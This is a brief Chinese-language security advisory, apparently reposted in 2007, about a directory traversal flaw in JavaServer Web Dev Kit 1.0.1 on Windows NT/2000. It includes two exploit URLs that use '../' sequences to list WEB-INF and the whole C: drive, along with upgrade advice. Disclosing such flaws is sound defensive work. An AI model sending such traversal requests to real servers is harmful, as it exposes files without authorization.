JavaServer Web Dev Kit(JSWDK) for win2000 目錄遍歷漏洞_自動測試腳本語言

JavaServer Web Dev Kit(JSWDK) for win2000 目錄遍歷漏洞

發表于：2007-06-21來源：作者：點擊數：標簽：

涉及程序： JavaServer Web Dev Kit(JSWDK) 描述： JavaServer Web Dev Kit(JSWDK) for win2000 目錄遍歷漏洞詳細：發現裝了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系統存在漏洞，攻擊者通過構造特殊的 URL 請求能訪問未授權文件。 exp

　　
　　涉及程序：
JavaServer Web Dev Kit(JSWDK)
描述：
JavaServer Web Dev Kit(JSWDK) for win2000 目錄遍歷漏洞
詳細：
發現裝了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系統存在漏洞，

攻擊者通過構造特殊的 URL 請求能訪問未授權文件。
exploits:
http://localhost:8080/examples//WEB-INF/
會列出 /WEB-INF/ 目錄 .
http://localhost:8080/../examples//WEB-INF/../../../../../
如果 JSWDK 被裝在 c: ，此請求將會列出 c: 下所有目錄和文件
受影響系統：
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000
解決方案：
CNNS 建議您升級 JSWDK 版本
建議您升級到tomcat.

原文轉自：http://www.kjueaiud.com

軟件測試 > 測試開發技術 > 軟件測試開發語言 > 自動測試腳本語言 >